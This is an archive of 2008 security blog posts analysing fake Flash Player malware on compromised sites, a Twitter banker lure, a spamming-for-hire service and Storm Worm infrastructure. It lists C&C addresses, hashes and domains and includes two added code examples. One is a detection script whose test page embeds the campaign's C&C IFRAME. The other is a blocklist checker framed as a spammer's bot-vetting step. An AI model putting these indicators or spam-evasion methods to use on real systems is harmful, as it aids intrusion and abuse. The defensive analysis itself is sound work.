Compromised Web Servers Serving Fake Flash Players

August 05, 2008
The tactic of abusing web servers whose vulnerable web applications allow a malicious attacker to locally host a malicious campaign is nothing new. In fact, malicious attackers have been building so much confidence in this risk-forwarding process of hosting their campaigns, that they would start actively spamming the links residing within low-profile legitimate sites across the web.



This campaign serving fake flash players is getting so prevalent these days, due to the multiple spamming approaches used, that it's hard not to notice it - and expose it. From a strategic perspective, having a legitimate low-profile site -- with the obvious exception of the participating sites that were purposely registered for malicious purposes -- host your malicious campaign is pretty creative in terms of forwarding the responsibility, and the eventual blocking of the legitimate site, to its owner. As far as the owners are concerned, it appears that some of them are already seeing the malware page popping up at the top of their daily traffic stats, and have taken measures to remove it.



Moreover, Adobe's Product Security Incident Response Team (PSIRT) issued a warning notice about the attack yesterday, which would come in handy if the attackers weren't also taking advantage of client-side vulnerabilities, putting the unaware end user in a situation where he wouldn't even receive a download dialog:



"We have seen coverage from the security community of a worm on popular social networking sites that is using social engineering lures to get users to install a piece of malware. According to the reports, the worm posts comments on these sites that include links to a fake site. If the link is followed, users are told they need to update their Flash Player. The installer, posted on a malicious site, of course installs malware instead of Flash Player. We’d like to take this opportunity to reiterate the importance of validating installers and updates before installing them. First off, do not download Flash Player from a site other than adobe.com – you can find the link for downloading Flash Player here. This goes for any piece of software (Reader, Windows Media Player, Quicktime, etc.) – if you get a notice to update, it’s not a bad idea to go directly to the site of the software vendor and download the update directly from the source. If the download is from an unfamiliar URL or an IP address, you should be suspicious."



The structure of the malware campaign is pretty static, with several exceptions where they also take advantage of client-side vulnerabilities (RealPlayer exploit), attempting to automatically deliver the fake flash update or player depending on the campaign. On each and every site there are dnd.js and master.js scripts which serve the rogue download window, and another .html file where an IFRAME attempts to access the traffic management command and control; in one randomly picked sample it was 207.10.234.217/cgi-bin/index.cgi?user200. A sample list of participating URLs, most of which are still active and running:






Sample detection rate: flashupdate.exe
Scanners result: 35/36 (97.23%)
Trojan-Downloader.Win32.Exchanger.hk; Troj/Cbeplay-A
File size: 78848 bytes
MD5: c81b29a3662b6083e3590939b6793bb8
SHA1: d513275c276840cb528ce11dd228eae46a74b4b4



The downloader then "phones back home" to 72.9.98.234 on port 443, which is serving the rogue security software AntiSpy Spider (antispyspider.net):



"AntiSpy Spider is a cutting-edge anti-spyware solution. This revolutionary anti-spyware program was created by the industry's top spyware experts in order to protect your computer and your privacy, while ensuring optimal system performance. With the ability to locate, eliminate and prevent the widest range of spyware threats, AntispyStorm is able to offer its users a safe, spyware-free computing experience; and with its convenient automatic update feature, AntispyStorm ensures continuous up-to-date protection."



Sample detection rate: antispyspider.msi
Scanners result: 11/35 (31.43%)
FraudTool.Win32.AntiSpySpider.b
File size: 1851904 bytes
MD5: 2f1389e445f65e8a9c1a648b42a23827
SHA1: e32aa6aa791e98fe6fdef451bd3b8a45bad0acd8
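As an added example (not code from the original post), here is a defender-side triage script that checks a site's pages for the two on-host markers described above, the dnd.js/master.js helper scripts and the IFRAME pointing at the traffic-management C&C at 207.10.234.217, and scans egress-log lines for contact with that C&C and with the downloader's phone-home address 72.9.98.234:443. The log format and the sample site and log lines are constructed for the example; the indicators are the ones quoted in the post.

```python
import re
from dataclasses import dataclass, field

# Indicators quoted in the write-up above. The helper-script names, the
# traffic-management C&C and the downloader's phone-home address are the
# post's own values; the log format and sample files below are constructed.
HELPER_SCRIPTS = {"dnd.js", "master.js"}
TRAFFIC_C2 = "207.10.234.217"            # IFRAME target (/cgi-bin/index.cgi?user200)
DOWNLOADER_C2 = ("72.9.98.234", 443)     # flashupdate.exe phones home here

# Grabs the src attribute of <script> and <iframe> tags, quoted or not.
TAG_SRC = re.compile(r'<(script|iframe)\b[^>]*?\bsrc\s*=\s*["\']?([^"\'\s>]+)', re.I | re.S)


@dataclass
class PageFindings:
    helper_scripts: list = field(default_factory=list)
    c2_iframes: list = field(default_factory=list)

    @property
    def suspicious(self):
        return bool(self.helper_scripts or self.c2_iframes)


def inspect_page(html):
    """Flag the two on-host markers of the campaign in one HTML document."""
    findings = PageFindings()
    for tag, src in TAG_SRC.findall(html):
        basename = src.rsplit("/", 1)[-1].split("?", 1)[0].lower()
        if tag.lower() == "script" and basename in HELPER_SCRIPTS:
            findings.helper_scripts.append(src)
        elif tag.lower() == "iframe" and TRAFFIC_C2 in src:
            findings.c2_iframes.append(src)
    return findings


def triage_docroot(files):
    """files maps a path to its HTML; returns only the pages that carry markers.
    A hosting provider would feed it the contents of a customer's document root."""
    return {path: f for path, f in ((p, inspect_page(c)) for p, c in files.items())
            if f.suspicious}


# Constructed egress-log shape: "<timestamp> <client> <dst_ip>:<dst_port> <url or ->"
LOG_LINE = re.compile(r"^\S+\s+(\S+)\s+(\d{1,3}(?:\.\d{1,3}){3}):(\d+)\s+(\S+)")


def scan_egress_log(lines):
    """Return (client, destination, reason) for connections to either C&C."""
    alerts = []
    for line in lines:
        m = LOG_LINE.match(line)
        if not m:
            continue
        client, ip, port, url = m.groups()
        if (ip, int(port)) == DOWNLOADER_C2:
            alerts.append((client, f"{ip}:{port}", "downloader phone-home (rogue AV backend)"))
        elif ip == TRAFFIC_C2 or TRAFFIC_C2 in url:
            alerts.append((client, f"{ip}:{port}", "traffic-management C&C contact"))
    return alerts


# Constructed sample data: a small site with one injected landing page, and
# three egress-log lines of which two touch the campaign's infrastructure.
SAMPLE_SITE = {
    "index.html": "<html><body><h1>Club news</h1></body></html>",
    "hotnews.html": ('<html><head><script src="dnd.js"></script>'
                     '<script type="text/javascript" src="/master.js"></script></head>'
                     '<body><iframe src="http://207.10.234.217/cgi-bin/index.cgi?user200" '
                     'width="1" height="1"></iframe></body></html>'),
    "contact.html": '<script src="jquery.js"></script><iframe src="map.html"></iframe>',
}
SAMPLE_EGRESS_LOG = [
    "2008-08-05T10:01:02 10.0.0.12 72.9.98.234:443 -",
    "2008-08-05T10:01:05 10.0.0.12 192.0.2.10:80 http://192.0.2.10/",
    "2008-08-05T10:02:11 10.0.0.40 207.10.234.217:80 http://207.10.234.217/cgi-bin/index.cgi?user200",
]

if __name__ == "__main__":
    for path, f in triage_docroot(SAMPLE_SITE).items():
        print(f"{path}: scripts={f.helper_scripts} iframes={f.c2_iframes}")
    for client, dst, reason in scan_egress_log(SAMPLE_EGRESS_LOG):
        print(f"{client} -> {dst}: {reason}")
```

Matching on the dropped file names alone (topnews.html, default.html and the like) would be far too noisy, so the script keys on the scripts and the C&C references instead.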



The bottom line - over a thousand domains are participating, with many others apparently joining the party in proportion to the web site owners' actions to get rid of the malware campaign hosted on their servers.




Twitter Malware Campaign Wants to Bank With You

August 05, 2008
In what appears to be a lone gunman malware campaign -- where the malware spreader even left his email address within the binary -- the now defunct Twitter malware campaign managed to attract only 69 followers before it was shut down, using a trivial approach for launching an XSS worm, Cross-site request forgery (CSRF). More info:

"This week it’s Twitter’s turn to host an attack - one that is targeting both Twitter users and the Internet community at large. In this case it's a malicious Twitter profile twitter.com/[skip]/ with a name that is Portuguese for ‘pretty rabbit’ which has a photo advertising a video with girls posted. 

This profile has obviously been created especially for infecting users, as there is no other data except the photo, which contains the link to the video. If you click on the link, you get a window that shows the progress of an automatic download of a so-called new version of Adobe Flash which is supposedly required to watch the video. You end up with a file labeled Adobe Flash (it’s a fake) on your machine; a technique that is currently very popular."

Let's analyze the campaign before it was shut down. The original Twitter account used, twitter.com/video_kelly_key, basically included a link to player-video-youtube.sytes.net (204.16.252.98), which was using a URL shortening service, fly2.ws/NilOMN3, in order to redirect to the banker malware located at freewebtown.com/construimagens/ Play-video-youtube.kelly-key.com. Its detection rate is as follows:

Scanners result: 14/36 (38.89%)
Trojan-Spy.Win32.Banker.caw
File size: 88064 bytes
MD5: 25600af502758ca992b9e7fff3739def
SHA1: 9262ca501ef388e0fe42c50a3d002ddbd6e254f2

Twitter isn't an exception to the realistic potential for XSS worms through CSRF that could affect each and every Web 2.0 service. As a matter of fact, all of them have suffered such attempts, namely Orkut, MySpace (as well as the QuickTime XSS flaw), GaiaOnline, Hi5, and most recently the XSS worm at Justin.tv, which demonstrate that trivial vulnerabilities come in handy for what could turn into a major security incident if not taken care of promptly.



McAfee's Site Advisor Blocking n.runs AG - "for starters"

August 04, 2008
Following the recent, and now fixed, false positive that blocked sans.org because dshield.org and giac.org were already considered malicious, it's also interesting to note that n.runs AG (nruns.com), whose research into vulnerabilities in antivirus products has received a lot of attention lately, is also flagged as a dangerous site.


Excluding the conspiracy theories, a false positive when your solution is integrated in the second most popular search engine is bad, especially when other automated crawling approaches are successfully detecting the site as a non-malicious one. How come? It's all a matter of how you define malicious activity, and what exactly you are trying to protect your users from.



In this case, SiteAdvisor seems to be trying to protect end users from themselves by flagging sites that host some sort of hacking/pen-testing tool in a plain directory structure. Since SiteAdvisor isn't capable of automatically flagging a SQL-injected site as malicious, the approach it takes for assessing whether or not a specific site is malicious is flawed: it integrates McAfee's signature-based malware database and flags any site hosting anything detected as malware as a badware site itself. McAfee's comments:


"Our tests are very accurate," Dowling said. "The frequency of false positives is fewer than one a month. Changes in classifications we make are almost always because sites have changed their behaviour. The email tests are the ones that have the most false positives. Users can have confidence in our ratings."



There are even more surprising false positives, such as the Hack in the Box security conference, Defcon.org, Zone-H France, Invisiblethings.org, AME Info - Middle East business and financial news (ameinfo.com), and more.



Take for instance the Hack in the Box security conference, which is considered the download publisher of a file hosted at packetstormsecurity.org. What's interesting to point out is that, just like a huge percentage of sites already flagged as potentially harmful that haven't been re-checked in months, in Hack in the Box's case the link was last checked in February 2008. And since hitb.org is now supposedly distributing spyware, any site that links to it is also flagged as badware, like hackinthebox.org itself:



"When we tested this site we found links to hitb.org, which we found to be a distributor of downloads some people consider adware, spyware or other potentially unwanted programs."



These sites aren't SQL injected, IFRAME-ed or embedded with malware whatsoever, so it's like flagging a gun store as a malicious store because of the inventory there - a wrong generalization aiming to bring order into the underground chaos in the first place is prone to result in lots of false positives, a wrong mentality that certain countries are starting to embrace.


The bottom line - is the "do not visit unknown or potentially harmful sites" security tip on the verge of extinction? Probably, as these days exploited legitimate sites are hosting or redirecting to more malware than potentially harmful sites are.

Summarizing July's Threatscape

August 01, 2008
July's threatscape -- consider going through June's summary as well -- once again demonstrated that nothing is impossible, the impossible just takes a little longer where the incentive would be the ultimate monetization of the process.



Russian hacktivists attacking Lithuania and Georgia, several Storm Worm campaigns, a couple of new malware tools, Neosploit team abandoning support for their web malware exploitation kit, CAPTCHA for several of the most popular free email providers getting efficiently attacked in order to resell the bogus accounts registered in the process, several copycat SQL injects next to the evasion techniques applied by the copycats, botnets continuing to commit click fraud and generate revenue for those who own or have rented them, an infamous money mule recruitment service taking advantage of the fast-fluxed network provided by the ASProx botnet - pretty interesting month indeed.



01. Decrypting and Restoring GPcode Encrypted Files -

The GPcode authors read the news too, and are catching up with the major weaknesses pointed out in their previous release in order to come up with a virtually unbreakable algorithm. And while more evidence of who's behind the GPcode ransomware was gathered, vendors and independent researchers realized that the latest release is also susceptible to a plain simple flaw, namely the original files were basically getting deleted and not securely erased, making them fairly easy to recover.



02. Chinese Bloggers Bypassing Censorship by Blogging Backward -

When you know how it works, you can either improve, abuse or destroy it, in that very particular order. Chinese bloggers are always very adaptive in respect to spreading their message, obfuscating their messages in a way that common keyword filtering software wouldn't be able to pick them up.



03. Gmail, Yahoo and Hotmail’s CAPTCHA Broken -

This has been an urban legend for a while, but with more services starting to offer hundreds of thousands of pre-registered accounts at these providers, it's not surprising that spam and phishing emails coming from legitimate email providers are increasing. The "vendors" behind these propositions are naturally starting to "vertically integrate" by offering value-added services for extra payments, namely scripts to automatically abuse the pre-registered accounts for automatic registration of splogs and anything else malicious or blackhat SEO related.



04. The Antivirus Industry in 2008 -

If it were anyone else but a security vendor to come up with such a realistic cartoon aiming to stimulate innovation by emphasizing on how prolific and sophisticated malware groups have become, it would have been a biased cartoon. However, this one is courtesy of a security vendor, and it's pretty objective.



05. Lithuania Attacked by Russian Hacktivists, 300 Sites Defaced -

This attack is a good example of a decent PSYOPS operation. Of course they had already built the capabilities to deface and even execute DDoS attacks against Lithuania, so why not put them in a "stay tuned" mode, by speculating on the upcoming attack and then executing it, making it look like they delivered what they promised? This was a lone gunman mass defacement, given that the sites were all hosted on a single ISP, with no indication of any kind of coordination whatsoever. The same goes for the Georgian President's web site, which was under DDoS attack from Russian hackers later in the month. Despite that the hacktivists behind it dedicated a separate C&C for the attack, one that hasn't been used in any type of previous attack so far, they made a minor mistake by using a secondary command and control location that's known to have been connected with a particular "botnet on demand" service in the past. The second attack once again proves that you don't need to build capacity when you can basically outsource the process to someone else.



06. The ICANN Responds to the DNS Hijacking, Its Blog Under Attack -

The ICANN finally issued a statement concerning the DNS hijacking of some of their domains, which is in fact what Comcast.net and Photobucket.com should have done as well, in addition to stating it was a "glitch". The ICANN also took advantage of the moment and pointed out that their blog has also been under attack during the month. There's no better example of how the combination of tactics, technological and social engineering, can result in the hijacking of the domains of the very organizations implementing procedures aiming to protect against these same attacks. And while Photobucket.com remained silent during the entire incident, the hosting provider that was used by the Netdevilz team in the two attacks (since they were also responsible for the ICANN and IANA DNS hijackings) issued a statement.



07. The Risks of Outdated Situational Awareness -

Security vendors are often in a "catch-up mode", and if I were an average Internet user not knowing that real-time situational awareness speaks for the degree to which my vendor knows what's going on online, I'd be pretty excited. However, I'm not. Prevx were catching up with a service which I covered approximately two months ago; I even had the chance to constructively confront one of the affected sites on how, despite their security measures in place, this attack was still possible. Recently Prevx have once again demonstrated an outdated situational awareness by coming across banking malware in July 2008, whereas the malware has been around since July 2007, and earlier depending on which version you're referring to.



08. Fake Porn Sites Serving Malware - Part Two -

Yet another domain portfolio of fake porn sites serving rogue codecs and live exploit URLs, just the tip of the iceberg as usual, however their centralization is greatly assisting in tracking them down.



09. Storm Worm's U.S Invasion of Iran Campaign -

Stormy Wormy is once again making the headlines with their ability to actually make up the headlines on their own.



10. Mobile Malware Scam iSexPlayer Wants Your Money -

The best scams are the ones to which you've personally agreed to be scammed with, without even knowing it. Like this one, which was tracked down and analyzed a couple of hours after a user tipped me off about it.



11. The Template-ization of Malware Serving Sites -

The increase of fake porn and celebrity sites is due to the overall template-ization of these, with the people behind them basically implementing several malicious doorways to ensure that the domains get rotated on the fly. Despite that they all look the same, they all serve different types of malware, and zero porn or celebrity content at all except the thumbnails.



12. Violating OPSEC for Increasing the Probability of Malware Infection -

No better way to expose your affiliations and several so far unknown bad netblocks than by adding the netblocks and the malicious domains as trusted sites upon infecting a PC with the malware. Of course, the usual suspects lead the "trusted netblocks".



13. Monetizing Compromised Web Sites -

Several years ago, a script kiddie would install Apache on a mail server and claim that they defaced it. Today, these amusing situations are replaced by monetization of the compromised sites: reselling the access to them to blackhat SEO-ers, malware authors and phishers, or personally starting to manage a scammy infrastructure on them, earning money on an affiliate-based model, like in this particular attack.



14. Malware and Office Documents Joining Forces -

A recent DIY malware kit, sold as a proprietary tool, basically crunches out malware-infected Office documents whose built-in obfuscation makes them harder to detect. It will sooner or later leak out, turning into a commodity tool, a process that's been pretty evident for web malware exploitation kits as well.



15. Are Stolen Credit Card Details Getting Cheaper? -

Depends on who you're buying them from, and whether or not they offer discounts on a volume basis, namely the more you buy the cheaper the price of a card is supposed to get. With the current oversupply of stolen credit card details, what was once an exclusive good on which they could enjoy a higher profit margin is today's commodity good.



16. The Neosploit Malware Kit Updated with Snapshot ActiveX Exploit -

Since all the web malware exploitation kits are open source, and leaked in the wild at large, their modularity allows everyone to easily embed any type of exploit they want to, resulting in Neosploit's single most beneficial feature, the fact that certain versions include all the publicly available exploits targeting Internet Explorer, Firefox and Opera. Moreover, the open source nature of the kit results in a countless number of modified versions yet to be detected and analyzed, therefore keeping track of the exploits included in a malware kit can only be realistic if you take into consideration the exploits that come with the default installation.



17. Obfuscating Fast-fluxed SQL Injected Domains -

Now that's a very good example of different tactics combined to attack, ensure survivability, and apply a certain degree of evasion in between.



18. The Unbreakable CAPTCHA -

There's never been a shortage of ideas, there's always been an issue of usability.



19. The Ayyildiz Turkish Hacking Group VS Everyone -

That's a pretty inspiring mission if you are to ensure your future in the next couple of years, by targeting everyone, everywhere that has ever publicly stated their disagreement with the Turkish foreign policy.



20. Money Mule Recruiters use ASProx's Fast Fluxing Services -

True multitasking in action, with a botnet that's been crunching out phishing emails, SQL injecting, and now hosting a well known money mule recruitment service.



21. SQL Injecting Malicious Doorways to Serve Malware -

Constantly switching tactics and combining different ones to achieve an objective that used to be accomplished by plain simple techniques is only starting to take place. In this case, instead of a hard coded SQL injected domain, we have the typical malicious doorways, the result of traffic management tools converging with web malware exploitation kits.



22. Impersonating StopBadware.org to Serve Fake Security Warnings -

Typosquatting popular security vendors and services is nothing new; having HostFresh provide the hosting for the parked domains promoting the rogue security software is a privilege, and a flattering sign of the success of the StopBadware initiative.



23. Coding Spyware and Malware for Hire -

Customerization -- not customization -- has been taking place for a while; that's the process of tailoring your upcoming products to the needs of your future customers, compared to the product concept myopia where the malware coder would code something that he believes would be valuable to the potential customers. End user agreements, issuing licenses for the malware tool, as well as forbidding the reverse engineering of the malware so that no remotely exploitable flaws could be found, are among the requirements the coder insists on.



24. Lazy Summer Days at UkrTeleGroup Ltd -

Taking a random snapshot of the current malicious activity at a well known provider of hosting services for rogue security applications, live exploit URLs and botnet command&control locations always provides an insight into what their customers are up to. In this case, the centralization of their scammy ecosystem, and parking a countless number of rogue domains on the same server.



25. Email Hacking Going Commercial -

Cybercrime is in fact getting easier to outsource, and while there is no shortage of scammers offering non-existent services, or at least services where they cannot deliver the goods, the business model of this one is that you pay only once they show you proof that they've managed to hack the email address you gave them. How are they doing it? Social engineering, and enticing the user to click on a live exploit URL from where they'll infect the PC and obtain the email password, next to definitely abusing it for many other purposes in the process.



26. Vulnerabilities in Antivirus Software - Conflict of Interest -

You can easily twist the number of vulnerabilities found in your antivirus solution by not recognizing them as vulnerabilities in the first place. It's all a matter of what you define as a vulnerability, or perhaps what you admit as a serious vulnerability - remote code execution through a security software, or a flaw that's allowing malware to bypass the security solution itself.



27. Counting the Bullets on the (Malware) Front -

Emphasizing the number of malware/threats/viruses/worms/slugs your solution detects may be marketable in the short-term, but is damaging the end user's understanding of the threatscape in the long-term. So, by the time he catches up with what exactly is going on, he'll recall the moment in time when he was using the number of threats his solution was detecting as the main benchmark for its usefulness. In reality, though, the number is irrelevant from a pro-active point of view, with zero day malware like the one coded for hire undermining the signature-based scanning model.



28. Smells Like a Copycat SQL Injection In the Wild -

It was pretty obvious that copycats, seeing the success of SQL injections and the huge number of sites susceptible to exploitation, would also start taking advantage of the practice. Some are, however, targeting local communities and trying to avoid detection by using targeted SQL injections.



29. Click Fraud, Botnets and Parked Domains - All Inclusive -

The scheme is nothing new, what's new is that the botnet masters are trying to limit the revenues that used to go out to affiliate networks they were participating in, and are trying to own or rent the entire infrastructure on their own.



30. Over 80 percent of Storm Worm Spam Sent by Pharmaceutical Spam Kings -

With access to Storm Worm sold and resold, and new malware introduced on Storm Worm infected hosts used as a foundation for the propagation of the new malware in this case, it's questionable whether the Storm Worm-ers themselves are sending out the junk emails, or whether it's the people who've rented access to the botnet doing it.



31. Neosploit Team Leaving the IT Underground -

Pretty surprising at first, but in reality it clearly demonstrates that when you cannot enforce the end user agreement on your crimeware kit, but continue seeing it used in very profitable malware operations, you basically shut down the support for the public version. The team is not going to stop innovating for their own purposes, and in the long-term they may in fact re-appear with an updated malware kit that's converging different services next to the product itself.



32. Dissecting a Managed Spamming Service -

Managed spamming services using botnets as the foundation for the campaigns are starting to introduce improved metrics for the delivery, as well as experienced customer support ensuring the spam messages make it through spam filters, or at least increasing the probability of that happening. This is an example of a random service emphasizing the improved metrics they're capable of delivering.



33. Storm Worm's Lazy Summer Campaigns -

Looks like a "cybercrime intern" launched this campaign, lacking any of the usual Storm Worm evasive practices: no exploitation of client side vulnerabilities, as well as no survivability offered by their usual fast-flux nodes.

Storm Worm's Lazy Summer Campaigns

July 31, 2008
The Storm Worm-ers seem to be lacking their usual creativity in respect to the usual social engineering attacks taking advantage of the momentum we're used to seeing. These days they're not piggybacking on real news items, they're starting to come up with new ones.



Storm's latest "FBI vs Facebook" campaign is an example of a very badly executed one, lacking their usual fast-flux, any kind of social engineering common sense, as well as client-side exploits, next to centralizing all the participating domains on a single nameserver.



Domains used :

wapdailynews .com

smartnewsradio .com

bestvaluenews .com

toplessnewsradio .com

companynewsnetwork .com

goodnewsgames .com

marketgoodnews .com

fednewsworld .com

toplessdailynews .com

stocklownews .com




DNS servers :

NS.BRPRBGOK6 .COM

NS2.BRPRBGOK6 .COM

NS3.BRPRBGOK6 .COM 

NS4.BRPRBGOK6 .COM

NS5.BRPRBGOK6 .COM

NS6.BRPRBGOK6 .COM



Strangely, the domain has been registered using an email hosted on a known Storm fast-flux node used in the recent 4th of July campaign and the "U.S. invasion of Iran" one :



Administrative Contact:

Lee Chung lee@likethisone1.com

+13205897845 fax:

1743, 34

Los-Angeles CA 321458

us




This Storm Worm sample is also "phoning back home" over HTTP next to the P2P traffic, and trying to obtain the rootkit from the now down policy-studies.cn /getbackup.php, using already known Storm nameservers :



ns2.verynicebank .com

ns3.verynicebank .com

ns.likethisone1 .com

ns2.likethisone1 .com

ns3.lollypopycandy .com

ns4.lollypopycandy .com



Someone's bored, definitely, making it look almost as if someone else is managing a Storm Worm campaign on their behalf.

Dissecting a Managed Spamming Service

July 30, 2008
With cybercrime getting easier to outsource these days, and with the overall underground economy's natural maturity from products to services, "managed spamming appliances" and managed spamming services are becoming rather common. Increasingly, these "vendors" are starting to "vertically integrate", namely, diversify the portfolio of services they offer in order to steal market share from other "vendors" offering related services like email database cleaning, segmentation of email databases, and email servers or botnets whose hosts have a pre-checked and relatively clean IP reputation, namely they're not blacklisted yet.



How much does it cost to send 1 million spam emails these days? According to a random spamming service, $100, excluding the discounts based on the desired sending speed, namely 10-20 per second or 20-30 per second. Let's dissect the service, and emphasize its key differentiation factors, as well as the customerization offered in the form of a dedicated server if the customer would like to send billions of emails :



"-- High quality and percentage of spam delivery 

-- Fast speed of delivery

-- Spam database on behalf of the vendor, or using your own database of harvested emails

-- Easily obtainable and segmented spam databases on per country basis

-- Randomization of the spam email's body and headers in order to achieve a higher delivery rate

-- Support for attachments, executables, and image files



The cost - $100 for a million delivered spam letters, with discounts of 20%-30%-40% for large volumes of spam, based on the value-added do-it-yourself customer interface built on a multi-user botnet command and control interface :

 


-- Automatic RBL verification

-- Support for many subjects, headers,

-- Total customization of the email sending process

-- Autogenerating junk content next to the spammers email/link in order to bypass filtering

-- Faking Outlook Message ID / Boundary / Content-ID

-- Interface added. Now you do not necessarily need to understand all the features of the system to start the list.

-- Convenient management tasks.

-- A high percentage of inbox delivery, on a good database, for Europe - 40-60% (for the United States - less, because of AOL and others there).

-- Improved metrics, whether or not the emails have been sent, lost, unknown receipt, or have been RBL-ed



With volumes of a billion - further discounts and the possibility of setting up a personal server. "



Rather surprising, they state that European email users have a higher probability of receiving the spam message compared to U.S. ones due to AOL. What they're actually trying to say is that it's due to AOL's use of DomainKeys Identified Mail (DKIM). As far as localization of the spam to the email owner's native language is concerned, this segmentation concept has been taking place for over a year now.



This service, like the majority of others, relies entirely on malware infected hosts, which, due to the multi-user nature of most malware command and control interfaces, allows them to easily add customers and set their privileges based on the type of service they purchase. This leaves countless opportunities for targeted spamming, and yes, spear phishing attacks, made possible by the segmentation of the emails based on country, city, even company.
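The "automatic RBL verification" in the feature list above is the check a service like this runs over its bots before a run, and it is the same lookup a mail server runs on a connecting host: reverse the IPv4 octets, append the blocklist zone, and ask for an A record, where an answer inside 127.0.0.0/8 means "listed". The following is an added example of that lookup and not the service's own code; the zone name dnsbl.example and the answers in FAKE_ANSWERS are constructed so it runs offline, and live_resolve is the resolver you would plug in for real use.

```python
"""DNSBL (RBL) lookup, the check a spamming service runs on its bots
before sending.  Added example, not the service's own code."""
import ipaddress
import socket

LISTED_RANGE = ipaddress.ip_network("127.0.0.0/8")  # DNSBLs answer inside 127/8


def dnsbl_query_name(ip, zone):
    """Build the reversed-octet query name, e.g. 10.2.3.4 -> 4.3.2.10.<zone>."""
    addr = ipaddress.ip_address(ip)
    if addr.version != 4:
        raise ValueError("this example handles IPv4 only")
    return ".".join(reversed(str(addr).split("."))) + "." + zone.rstrip(".")


def live_resolve(name):
    """Real resolver for production use: A records for name, [] on NXDOMAIN."""
    try:
        return socket.gethostbyname_ex(name)[2]
    except socket.gaierror:
        return []


def check_dnsbl(ip, zone, resolve=live_resolve):
    """Return a verdict dict; 'listed' is True only for answers inside 127/8.
    Any other answer (a wildcarded or expired zone) is flagged 'invalid'
    rather than being trusted either way."""
    answers = resolve(dnsbl_query_name(ip, zone))
    codes = [a for a in answers if ipaddress.ip_address(a) in LISTED_RANGE]
    return {
        "ip": ip,
        "zone": zone,
        "listed": bool(codes),
        "codes": sorted(codes),
        "invalid": bool(answers) and not codes,
    }


def triage(ips, zone, resolve=live_resolve):
    """Split a pool of sending hosts into clean / listed / invalid."""
    buckets = {"clean": [], "listed": [], "invalid": []}
    for ip in ips:
        verdict = check_dnsbl(ip, zone, resolve)
        if verdict["invalid"]:
            buckets["invalid"].append(ip)
        elif verdict["listed"]:
            buckets["listed"].append(ip)
        else:
            buckets["clean"].append(ip)
    return buckets


# Constructed zone data standing in for a real DNSBL (hypothetical zone name).
FAKE_ZONE = "dnsbl.example"
FAKE_ANSWERS = {
    "4.3.2.10.dnsbl.example": ["127.0.0.2"],               # listed: spam source
    "5.3.2.10.dnsbl.example": ["127.0.0.4", "127.0.0.2"],  # listed with two codes
    "1.0.0.192.dnsbl.example": ["198.51.100.7"],           # bogus answer, not a listing
}


def fake_resolve(name):
    return FAKE_ANSWERS.get(name, [])


if __name__ == "__main__":
    pool = ["10.2.3.4", "10.2.3.5", "10.2.3.6", "192.0.0.1"]
    print(triage(pool, FAKE_ZONE, fake_resolve))
```

The meaning of the individual 127.0.0.x return codes differs per zone, so the code only distinguishes "listed" from "not listed" and treats any answer outside 127/8 as a broken lookup; a zone that starts wildcarding after it expires would otherwise mark every host as listed.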



In the long term, the people behind spamming providers, web malware exploitation kits and DIY phishing kits will inevitably start introducing built-in features which were once available through third-party services. For instance, hosting infrastructure for the spam/phishing/live exploit URLs, or even managed fast-flux infrastructure, have the potential to become widely available if such optional features get built into phishing kits, or start getting offered by the spamming provider itself. And since the affiliate based model seems to be working just fine, the ongoing underground consolidation will converge providers of different underground goods and services, where everyone would be driving customers to one another's services and earning revenue in the process.

Neosploit Team Leaving the IT Underground

July 29, 2008
The Neosploit Team are abandoning support for their Neosploit web exploitation malware kit, citing a negative return on investment as the main reason behind their decision. However, Neosploit's open source nature, just like that of the majority of web malware kits, and the fact that it's slowly but surely turning into a commodity malware kit just like MPack and Icepack did, greatly contribute to its extended "product lifecycle" :



"Let’s discuss their business model, how other cybercriminals disintermediated it thereby ruining it, and most importantly, how is it possible that such a popular web malware exploitation kit cannot seem to achieve a positive return on investment (ROI). The short answer is - piracy in the IT underground, and their over-optimistic assumption that high-profit margins can compensate the lack of long-term growth strategy, which in respect to web malware exploitation kits has to do with the benefits coming from converging with traffic management tools. Let’s discuss some key points."



The end of the Neosploit malware kit doesn't mean the end of the Neosploit Team, or a sudden migration to other malware kits just because they're no longer providing support in the form of new obfuscations and sets of exploits to their customers. Their customers have in fact been self-servicing their needs, enjoying the modular nature of the kit, the result of which is an unknown number of modified Neosploit kits.



Related posts:

The Underground Economy's Supply of Goods and Services

The Dynamics of the Malware Industry - Proprietary Malware Tools 

Localizing Cybercrime - Cultural Diversity on Demand 

E-crime and Socioeconomic Factors 

Localizing Open Source Malware 

Coding Spyware and Malware for Hire

The FirePack Exploitation Kit Localized to Chinese

MPack and IcePack Localized to Chinese

The Icepack Exploitation Kit Localized to French

Over 80 percent of Storm Worm Spam Sent by Pharmaceutical Spam Kings

July 29, 2008
It used to be the case that a botnet would be used for a single purpose: spamming, phishing, or malware spreading. At a later stage, the steady supply of malware infected hosts allowed botnet masters more opportunities to "sacrifice" the clean IP reputation and engage in several malicious activities simultaneously - today's underground multitasking, improving the monetization of what used to be commodity goods and services.



Today, a botnet will not only be sending out phishing emails and automatically SQL injecting vulnerable sites across the web, but also providing fast-flux infrastructure to money mule recruitment services, all of this for the sake of optimizing the efficiency of the botnet in general. This optimization makes it possible for a single botnet to be partitioned and access to it sold and resold so many times that it would be hard to keep track of all the malicious activities it participates in. Cybercrime on multiple fronts using a single botnet is only starting to take hold as a concept.



That's the case with Stormy Wormy, according to IronPort whose "Researchers Link Storm Botnet to Illegal Pharmaceutical Sales" :



"Our previous research revealed an extremely sophisticated supply chain behind the illegal pharmacy products shipped after orders were placed on botnet-spammed Canadian pharmacy websites. But the relationship between the technology-focused botnet masters and the global supply chain organizations was murky until now," said Patrick Peterson, vice president of technology at IronPort and a Cisco fellow. "Our research has revealed a smoking gun that shows that Storm and other botnet spam generates commissionable orders, which are then fulfilled by the supply chains, generating revenue in excess of (US)$150 million per year."



Murky until now? I can barely see anything around me due to all the smoke coming from the smoking guns of who's what, what's when, and who's done what with whom, especially in respect to Storm Worm, whose multitasking on different fronts in the first stages of their appearance online made it possible to establish links between several different malware groups and the "upstream hosting providers", until the botnet scaled enough to make it harder to keep track of all of their activities.



The Storm Worm-ers themselves aren't sending out pharma spam; the customers to whom they've sold access to parts of Storm Worm are the ones sending it. Here's a brief analysis published in May - "Storm Worm Hosting Pharmaceutical Scams". What's in it for the scammers? Income based on a revenue-sharing affiliate program; this particular pharmacy affiliate program has been around for several years :



"This criminal organization recruits botnet spamming partners to advertise their illegal pharmacy websites, which receive a 40 percent commission on sales orders. The organization offers fulfillment of the pharmaceutical product orders, credit card processing and customer support services"



